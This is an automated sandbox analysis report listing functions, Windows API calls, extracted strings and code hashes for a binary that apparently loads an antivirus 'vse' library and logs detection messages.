Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: EntryFunctionLookup
String ID:
API String ID: 3852435196-0
Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704

Function 000000014000DDD9 Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

, xrefs: 000000014000E388

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40

Function 000000014000F370 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 000000014000F398

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00

Function 000000014000E178 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00

Function 000000014000DFFE Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40

Function 00000001400092E0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00000001400092EB

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700

Function 000000014000DEFB Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40

Function 000000014000DDFF Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40

Function 000000014000DE96 Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40

Function 000000014000CC00 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704

Function 000000014000C2A0 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710

Function 00000001400110F0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700

Function 00007FFE1320FD40 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction ID: b6d44495be9a203fe2c7ec73e1dbe77d54a4c1568e75fb48fff8d59d5bfafe36
Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction Fuzzy Hash: F9F06271B196958EEBA49F29A942A2977D4E798390F948079D68D83B14D63C9060CF04

Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWaitableTimer.KERNEL32 ref: 000000014000390C
#4.VSELOG ref: 000000014000395D
#4.VSELOG ref: 000000014000398D
EnterCriticalSection.KERNEL32 ref: 0000000140003996
LeaveCriticalSection.KERNEL32 ref: 00000001400039A7
WaitForMultipleObjects.KERNEL32 ref: 00000001400039CB
#4.VSELOG ref: 0000000140003A04
EnterCriticalSection.KERNEL32 ref: 0000000140003A0D
SetEvent.KERNEL32 ref: 0000000140003A52
ResetEvent.KERNEL32 ref: 0000000140003A5F
LeaveCriticalSection.KERNEL32 ref: 0000000140003A70
#4.VSELOG ref: 0000000140003AA1
#4.VSELOG ref: 0000000140003AD5

Strings

amps_Listen: pHandle=%pdetection message: %s, xrefs: 0000000140003BED
amps_Listen: pHandle=%paction taken: %d, xrefs: 0000000140003CC7
amps_Listen: pHandle=%pobject archive name: %s, xrefs: 0000000140003B74
null, xrefs: 0000000140003AEF
amps_Listen: pHandle=%pobject type: %d, xrefs: 0000000140003B3D
amps_Listen: pHandle=%psession Id: %d, xrefs: 0000000140003CFB
amps_Listen: pHandle=%pdetection name: %s, xrefs: 0000000140003BB2
amps_Listen: pHandle=%p, message is:, xrefs: 0000000140003A90
amps_Listen: pHandle=%pdetection component type: %d, xrefs: 0000000140003C93
amps_Listen: pHandle=%peventId: %d, xrefs: 0000000140003AC4
amps_Listen: pHandle=%p, waiting for messages from the AMP queue, xrefs: 000000014000397C
amps_Listen: pHandle=%p, message received, pulling from AMP queue, xrefs: 00000001400039F3
amps_Listen: pHandle=%pdetection accuracy: %d, xrefs: 0000000140003C2B
amps_Listen: pHandle=%pdetection type: %d, xrefs: 0000000140003C5F
amps_Listen: pHandle=%pobject name: %s, xrefs: 0000000140003B02
amps_Listen: pHandle=%p, p=%p, xrefs: 0000000140003949

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
API String ID: 1021822269-3147033232
Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32 ref: 0000000140001054
GetProcAddress.KERNEL32 ref: 000000014000106C
FreeLibrary.KERNEL32 ref: 000000014000108F
GetProcAddress.KERNEL32 ref: 00000001400010D2
GetProcAddress.KERNEL32 ref: 00000001400010ED
GetProcAddress.KERNEL32 ref: 0000000140001108
GetProcAddress.KERNEL32 ref: 0000000140001123
GetProcAddress.KERNEL32 ref: 000000014000113E
GetProcAddress.KERNEL32 ref: 0000000140001159
GetProcAddress.KERNEL32 ref: 0000000140001174
FreeLibrary.KERNEL32 ref: 0000000140001194
InitializeCriticalSection.KERNEL32 ref: 00000001400011BE

Strings

vseSet, xrefs: 0000000140001166
vseGlobalRelease, xrefs: 00000001400010DF
{7A7E8119-620E-4CEF-BD5F-F748D7B059DA}, xrefs: 0000000140001081
MsiLocateComponentW, xrefs: 0000000140001062
vseGet, xrefs: 000000014000114B
vseInit, xrefs: 00000001400010FA
vseExec, xrefs: 0000000140001130
vseGlobalInit, xrefs: 00000001400010C8
msi.dll, xrefs: 0000000140001042
vseRelease, xrefs: 0000000140001115

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
API String ID: 883923345-381368982
Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700

Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002492
LeaveCriticalSection.KERNEL32 ref: 00000001400024A3
SetEvent.KERNEL32 ref: 00000001400024AD
EnterCriticalSection.KERNEL32 ref: 00000001400024C0
LeaveCriticalSection.KERNEL32 ref: 00000001400024D1
WaitForMultipleObjects.KERNEL32 ref: 00000001400024F1
CloseHandle.KERNEL32 ref: 00000001400024FB
CloseHandle.KERNEL32 ref: 0000000140002505
EnterCriticalSection.KERNEL32 ref: 0000000140002514
SetEvent.KERNEL32 ref: 000000014000255E
ResetEvent.KERNEL32 ref: 000000014000256B
LeaveCriticalSection.KERNEL32 ref: 0000000140002575
GetProcessHeap.KERNEL32 ref: 0000000140002591
HeapFree.KERNEL32 ref: 000000014000259F
GetProcessHeap.KERNEL32 ref: 00000001400025AE
HeapFree.KERNEL32 ref: 00000001400025BC
GetProcessHeap.KERNEL32 ref: 00000001400025CB
HeapFree.KERNEL32 ref: 00000001400025D9
GetProcessHeap.KERNEL32 ref: 00000001400025E8
HeapFree.KERNEL32 ref: 00000001400025F6

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
String ID:
API String ID: 1613947383-0
Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300

Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 000000014000451B
EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 0000000140004525
GetProcessHeap.KERNEL32 ref: 000000014000454C
HeapFree.KERNEL32 ref: 000000014000455A
SetEvent.KERNEL32 ref: 0000000140004567
ResetEvent.KERNEL32 ref: 0000000140004571
LeaveCriticalSection.KERNEL32 ref: 000000014000457B
CloseHandle.KERNEL32 ref: 000000014000458A
CloseHandle.KERNEL32 ref: 0000000140004599
LeaveCriticalSection.KERNEL32 ref: 00000001400045A3
DeleteCriticalSection.KERNEL32 ref: 00000001400045AD
GetProcessHeap.KERNEL32 ref: 00000001400045D2
HeapFree.KERNEL32 ref: 00000001400045E0
GetProcessHeap.KERNEL32 ref: 00000001400045F5
HeapFree.KERNEL32 ref: 0000000140004603

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304

Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400048AD
EnterCriticalSection.KERNEL32 ref: 00000001400048BA
GetProcessHeap.KERNEL32 ref: 00000001400048F1
HeapFree.KERNEL32 ref: 0000000140004903
SetEvent.KERNEL32 ref: 0000000140004917
ResetEvent.KERNEL32 ref: 0000000140004924
LeaveCriticalSection.KERNEL32 ref: 0000000140004931
CloseHandle.KERNEL32 ref: 0000000140004943
CloseHandle.KERNEL32 ref: 0000000140004955
LeaveCriticalSection.KERNEL32 ref: 0000000140004962
DeleteCriticalSection.KERNEL32 ref: 000000014000496F
GetProcessHeap.KERNEL32 ref: 00000001400049A7
HeapFree.KERNEL32 ref: 00000001400049B9
GetProcessHeap.KERNEL32 ref: 00000001400049D5
HeapFree.KERNEL32 ref: 00000001400049E7

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214

Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002E63
LeaveCriticalSection.KERNEL32 ref: 0000000140002EE7
EnterCriticalSection.KERNEL32 ref: 0000000140002EF9
EnterCriticalSection.KERNEL32 ref: 0000000140002F35
LeaveCriticalSection.KERNEL32 ref: 0000000140002FC0
RegCreateKeyExW.ADVAPI32 ref: 000000014000300B
RegSetValueExW.ADVAPI32 ref: 000000014000304C
